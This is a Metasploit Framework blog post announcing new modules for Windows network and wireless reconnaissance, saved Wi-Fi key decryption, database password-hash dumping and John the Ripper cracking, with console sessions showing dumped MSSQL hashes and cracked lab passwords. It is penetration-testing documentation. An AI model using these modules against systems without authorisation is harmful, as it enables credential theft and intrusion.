Last updated at Fri, 19 Jan 2024 15:54:51 GMT
The Metasploit Framework continues to grow and expand with the support of the community. There have been many new features added to the Metasploit Framework over the past month. I am very excited to be able to share some of these new developments with you.
Mubix's Recon Modules
Mubix's post-exploitation modules form his Derbycon talk are now in the repository. The resolve_hostname module, originally called 'Dig', will take a given hostname and resolve the IP address for that host from the windows victim. The enum_termserv module will dump Windows RDP connections form the victim machine, to give you a list of other potential targets. The computer_browser_discovery module, formerly called netdiscovery, taps the victim machine's Computer Browser Service via Railgun. This will return a list of all machines available on the same broadcast domain as the victim machine. an addition to mubix's original module has been made to give users the options to create host records in the Metasploit database for any hosts discovered this way.
[*] [2011.12.05-15:35:57] Found 4 systems.
.
...[*] [2011.12.05-15:36:02] Netdiscovery Results
====================
TYPE IP COMPUTER NAME VERSION COMMENT
---- -- ------------- ------- -------
69635 192.168.2.35 WINXPTEST 5.1
69635 192.168.2.9 MELODIE 6.1
8556551 DMALONEY-VDSDA 5.2
Windows Wireless LAN
There are a new group of Windows Post modules under post/windows/wlan. These modules all use Railgun to hook the windows WLANAPI. There are currently four modules in this group:
wlan_profile: This module will enumerate all of the wireless LAN interfaces on the machine. It will then enumerate all the saved wireless profiles on each interface. If the meterpreter session has sufficient privileges it will also decrypt the wireless key material. One caveat to this last part is that Windows XP does not actually store the WPA keyphrase. It instead stores the derived key which was derived using the PBKDF2() function. since this is all windows stores, it is surely still usable in this format but does not do you any good from a password reuse standpoint. On the TODO list is another module that will make the victim machine connect to a specific network with the option of using one of the pre-saved profiles or passing it your own profile.
msf post(wlan_profile) > set SESSION 1
SESSION => 1
msf post(wlan_profile) > exploit
[ ] Wireless LAN Profile Information
GUID: {eb566b46-0140-4eca-800a-a5e01fae7251} Description: Intel(R) Centrino(R) Advanced-N 6230 State: The interface is connected to a network.
Profile Name: derbycon
derbycon
6465726279636F6E
derbycon
ESS
auto
WPA2PSK
AES
false
passPhrase
false
derbycon
wlan_current_connection: This module will enumerate all of the wireless LAN interfaces on the victim machine, and then get information about the current wireless connection on each one. This information includes the MAC address of the access point, the SSID, the BSS type, the connection type, signal strength, RX/TX rates, security settings, encryption and authentication algorithms used, and whether 802.1x authentication is used on the network.
msf post(wlan_current_connection) > set SESSION 1
SESSION => 1
msf post(wlan_current_connection) > exploit
[ ] GUID: {eb566b46-0140-4eca-800a-a5e01fae7251}
Description: Intel(R) Centrino(R) Advanced-N 6230
State: The interface is connected to a network.
Mode: connection initiated by wireless service automatically using a persistent profile.
Profile: Skynet
SSID: Skynet
AP MAC: xx:xx:xx:xx:xx:xx
BSS Type: Infrastructure
Physical Type: Extended rate PHY type
Signal Strength: 94
RX Rate: 54000
TX Rate: 54000
Security Enabled: Yes
oneX Enabled: No
Authentication Algorithm: WPA-PSK
Cipher Algorithm: TKIP
[*] WlanAPI Handle Closed Successfully
[*] Post module execution completed
wlan_bss_list: This module will enumerate all of the wireless LAN interfaces on the machine. It will then scan with each interface for new wireless networks. It then records the information about all of the available wireless networks. This information includes a lot of the same information pulled down by the current_connection module.
msf post(wlan_bss_list) > set SESSION 1
SESSION => 1
msf post(wlan_bss_list) > exploit
[*] {"GetLastError"=>0, "return"=>0, "ppWlanBssList"=>5282784}
[*] Number of Networks: 16
[ ] SSID: horton
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -90
Signal: 16
[ ] SSID: Skynet
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: 802.11n PHY type
RSSI: -25
Signal: 99
[ ] SSID: WIN_930
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -89
Signal: 18
[ ] SSID: The Dragisic Network
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -86
Signal: 23
[ ] SSID: jacob1
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -76
Signal: 40
[ ] SSID: WIN_BA74
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -78
Signal: 36
[ ] SSID: MonroeMFC
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -90
Signal: 16
[ ] SSID: starmonster
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -81
Signal: 31
[ ] SSID: Eric Home
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -87
Signal: 21
[ ] SSID: linksys
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: High-rate DSSS (HRDSSS)
RSSI: -74
Signal: 43
[ ] SSID: Tarheel_Country
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -72
Signal: 46
[ ] SSID: W32.Blaster.Worm
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -80
Signal: 33
[ ] SSID: Leidi
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -88
Signal: 20
[ ] SSID: theriault
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: 802.11n PHY type
RSSI: -81
Signal: 31
[ ] SSID: EckerNet
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -75
Signal: 41
[ ] SSID: Belkin_G MIMO_Wireless_E5A125
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -87
Signal: 21
[*] WlanAPI Handle Closed Successfully
[*] Post module execution completed
wlan_disconnect: This module takes an integer as an argument. that Integer is the index of the interface you want to target. Most machines will likely only have 1 wireless interface, and so this option can be left on the default value of 0. The module will disconnect the specified wireless interface from whatever network it is currently connected to. This will be more useful when the module to connect the interface to a specified network is done.
Database Hash dumping
There are some interesting new Auxiliary modules in the framework now too. These are hashdump modules for several of the more popular database servers: MSSQL, MySQL, Postgres, and Oracle. The modules take supplied credentials and log onto the databases on a given port across a supplied RHOSTS list. It will then attempt to dump all the database user password hashes. If it succeeds, it will then store them in a csv as loot for further cracking. These modules will also attempt to save all the database, table, and instance names from the database. It will use these for wordlist building when attempting to crack the hashes.
msf auxiliary(mssql_hashdump) > exploit
[*] Instance Name: "WINTEST2008"
[ ] 192.168.2.13:1055 - Saving mssql05.hashes = sa:010051aa13a36f6efb5296ee8b804138173e0696d0892c52fcb6
[ ] 192.168.2.13:1055 - Saving mssql05.hashes = ##MS_PolicyEventProcessingLogin##:010031b4ae8d43c66a1a17f5f5e7da86a1764dc48ddc6 babdd9e
[ ] 192.168.2.13:1055 - Saving mssql05.hashes = ##MS_PolicyTsqlExecutionLogin##:010094044117b73bd4051b810dab0b7db5e3cbd8bb402c3 6ffe0
[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user1:01006dcfe5ee776f7fa8210a33c5bf2aaaef2b5ee25f315a2890
[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user2:0100acc65dd1643d5a43320af56bc37861e6ba4af7b9a0e866ee
[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user3:0100e838d7b99cedfb902161be09e3e859f2aca099f5eb49684b
[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user4:0100a9ec455822cb06dcb752390725649dbf669aa1994669a1ce
[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user5:0100a5a9092099814984bbbf0aa851477b5edbd1a5406ba1bebb
[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user6:01001d924e4d071f25849387181a2c1b0336b60baecf3e78b874
[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user7:01001e0a03d8f99fb1355ae09ebde36686f1041c072e4111f999
[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user8:0100c506c9b67d8592f9f36982c82f8907ac38258b1fe358a84c
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_hashdump) >
Linux unshadow
The auxiliary/analyze/jtr_unshadow module is another new addition. This module exists for scenarios where you can pull arbitrary files off victim machines in less standard ways, such as directory traversal attacks. It will take paths to locally stored passwd and shadow files. It will then unshadow the passwd file and store it as loot for future cracking.
New Password Cracking Options
Building on the success of our first John the Ripper(JtR) cracking module, we now have a few more. There are John the Ripper modules for cracking Microsoft SQL Server, MySql, Oracle, and Linux hashes. It will look for the database hashes in the loot files created by the previously mentioned hashdump modules. All of these modules will assemble a wordlist based on a number of things:
- The default wordlist we ship with
- All usernames and passwords currently stored in the creds table
- All hostnames in the hosts table
- Any passwords already cracked by JtR (in the .pot file)
- Any captured MSSQL instance names
- Any database and table names gathered by db hashdump modules
- An optional user supplied wordlist
All of these items are pulled together, and uniqued to create a wordlist for cracking. It will then attempt limited password cracking using these wordlists and some fast and easy cracking rules. These modules are not a thorough cracking attempt, but rather an attempt to crack the quick and easy hashes. any hashes that are successfully cracked are then stored as creds in the database.
msf auxiliary(mssql_hashdump) > use auxiliary/analyze/jtr_mssql_fast
msf auxiliary(jtr_mssql_fast) > exploit
[*] Cracking MSSQL Hashes
[*] Cracking MSSQL05 Hashes
[*] HashList: /tmp/jtrtmp20111205-10995-2yklnu-0
[*] Trying Wordlist: /tmp/jtrtmp20111205-10995-1s8wt88-0
guesses: 5 time: 0:00:01:20 DONE (Mon Dec 5 15:13:41 2011) c/s: 3436K trying: �tude1900
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])
[*] Output: WINTEST2008 (user6)
[*] Output: password2 (user2)
[*] Output: password2 (user1)
[*] Output: user3 (user3)
[*] Output: password8 (user8)
[*] Trying Rule: All4...
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 0 time: 0:00:02:05 DONE (Mon Dec 5 15:15:47 2011) c/s: 3947K trying: |||}
[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])
[*] Output: Remaining 6 password hashes with 6 different salts
[*] Trying Rule: Digits5...
guesses: 0 time: 0:00:00:00 DONE (Mon Dec 5 15:15:47 2011) c/s: 2898K trying: 89092
[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])
[*] Output: Remaining 6 password hashes with 6 different salts
[*] user1:password2:192.168.2.13:1055
[*] user2:password2:192.168.2.13:1055
[*] user3:user3:192.168.2.13:1055
[*] user6:WINTEST2008:192.168.2.13:1055
[*] user8:password8:192.168.2.13:1055
[*]
[*] 5 password hashes cracked, 6 left
[*] 5 hashes were cracked!
[ ] Host: 192.168.2.13 Port: 1055 User: user1 Pass: password2
[ ] Host: 192.168.2.13 Port: 1055 User: user2 Pass: password2
[ ] Host: 192.168.2.13 Port: 1055 User: user3 Pass: user3
[ ] Host: 192.168.2.13 Port: 1055 User: user6 Pass: WINTEST2008
[ ] Host: 192.168.2.13 Port: 1055 User: user8 Pass: password8
[*] Auxiliary module execution completed
msf auxiliary(jtr_mssql_fast) >
One thing to note is that the jtr_linux module is not listed as fast mode. This is because this module can be very slow depending on the type of Linux hashes it is trying to crack. If the hashes were created using crypt(3) this module can be VERY slow.
There is also one other hash cracking module that does not use JtR. This is the postgres_md5_crack module. JtR currently does not support Postgres md5 hashes. These hashes are create by taking the password and appending the username before md5 hashing it. The postgres_md5_crack module generates a wordlist the same way the JtR modules do. It then takes each word appends the username of the hash being tried, md5 hashes it and compare against the hash. If it's a match it saves the discovered cred in the database. This module can actually move surprisingly fast, but is not necessarily a thorough cracking method.
These are just some of the new features that have been added to the Metasploit Framework over the past month. Stay tuned as there are sure to be even more great new features coming. If there is something that Metasploit doesn't do, that you think it should, let us know. Better yet, try your hand at writing it yourself and send us a Pull Request on Github! Cheers for now.
